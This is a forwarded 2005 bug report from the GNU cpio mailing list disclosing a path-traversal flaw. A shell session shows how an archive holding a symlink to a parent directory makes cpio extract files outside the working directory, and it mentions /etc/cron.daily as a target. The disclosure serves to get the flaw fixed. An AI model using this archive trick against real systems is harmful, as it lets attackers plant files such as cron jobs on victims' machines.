Part 2. ---------- Forwarded message ---------- From: t takahashi <[EMAIL PROTECTED]> Date: Apr 27, 2005 7:54 PM Subject: Re: Bug#306693: cpio: allows extracting insecure pathnames (leading slash = / and dotdot = ..) To: [EMAIL PROTECTED], [email protected] Cc: [EMAIL PROTECTED]
P.P.S. I found a more subtle security hole. It is even more dangerous. /tmp/aaa$ mkdir ../b /tmp/aaa$ ln -s ../b b /tmp/aaa$ touch ../b/trojan /tmp/aaa$ ls b trojan /tmp/aaa$ find b b/trojan b b/trojan /tmp/aaa$ find b b/trojan | cpio -o > dangerous cpio: b: truncating inode number cpio: b/trojan: truncating inode number 1 block /tmp/aaa$ /bin/rm -v b/trojan b removed `b/trojan' removed `b' /tmp/aaa$ ls dangerous /tmp/aaa$ cpio -t<dangerous b b/trojan 1 block /tmp/aaa$ cpio -vt<dangerous lrwxrwxrwx 1 kpc kpc 4 Apr 27 19:46 b -> ../b -rw------- 1 kpc kpc 0 Apr 27 19:46 b/trojan 1 block Notice that grep '\.\.' on the output of cpio -t would not find the relative pathname. You have to use cpio -vt. Now watch this: /tmp/aaa$ cpio -i<dangerous 1 block /tmp/aaa$ ls b dangerous /tmp/aaa$ ls ../b trojan IMHO cpio should disallow this by default. Imagine ../../../../../../../etc/cron.daily again. cpio should check for extracting in directories that are not below pwd, even if it is via indirect means such as a symlink. Wow! _______________________________________________ Bug-cpio mailing list [email protected] http://lists.gnu.org/mailman/listinfo/bug-cpio
